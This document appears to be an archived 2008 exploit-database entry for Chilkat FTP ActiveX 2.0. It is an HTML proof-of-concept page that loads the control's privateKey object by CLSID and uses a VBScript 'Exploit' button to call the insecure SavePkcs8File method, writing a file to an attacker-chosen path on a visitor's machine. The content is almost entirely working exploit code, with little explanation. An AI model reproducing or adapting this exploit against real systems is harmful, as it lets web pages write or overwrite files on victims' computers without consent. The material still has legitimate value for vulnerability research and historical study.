Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method

EDB-ID: 5028
Author: darkl0rd
Type: remote
Platform: Windows
Published: 2008-01-31

<body bgcolor="#000000">

<center>
<font color="#00FF00" face="Verdana" size="2">=======================================================================</font>
<h1 id="product"><font color="#00FF00" face="Verdana" size="2">Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method<br><br>
Web site : <a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a><br><br>
=======================================================================<br>
<span style="font-style:normal; font-variant:normal; font-size:10pt; font-family:Verdana; font-weight:700">Author: darkl0rd<br><br>E-mail: l_l_darkl0rd_l_l@yahoo.com</span><br>
<span style="font-style:normal; font-variant:normal; font-weight:normal; font-size:10pt; font-family:Verdana"><br>Tested on Windows XP Professional SP2, with Internet Explorer 6</span></font></h1>
<p id="product"><font color="#FF0000">Class privateKey<br>GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}<br>Number of Interfaces: 1<br>Default Interface: IPrivateKey</font></p>
<p id="product"><font color="#FF0000">SavePkcs8File</font></p>
</center>

<div align="center"><font color="#00FF00">
<object classid='clsid:A934AEE3-8896-485F-8A55-ACF2A87BD010' id='over' align="left" width="1" height="2"></object>
<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 ' SavePkcs8File is called on the privateKey object with the path held in mystr
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SavePkcs8File mystr
   MyMsg = MsgBox(" Done ! ")
 End Sub
</script>
</font></div>

</body>

# milw0rm.com [2008-01-31]